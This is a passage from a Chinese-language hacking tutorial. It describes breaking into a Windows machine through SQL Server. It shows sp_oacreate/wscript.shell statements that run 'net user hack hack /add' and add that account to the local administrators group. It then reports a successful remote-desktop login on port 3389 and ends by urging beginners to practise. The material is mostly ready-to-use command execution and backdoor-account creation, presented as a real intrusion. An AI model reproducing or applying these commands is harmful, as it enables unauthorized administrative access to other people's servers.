declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20

提升管理权限
怎么样?是不是条条大路通罗马?
用增加的用户登陆3389看看(图21)

用3389端口,果然成功登陆了!!
四.小结
由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的部分,文章读起来很简单,笔者在实际中可是遇到很多问题,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。
关注此文的读者还看过: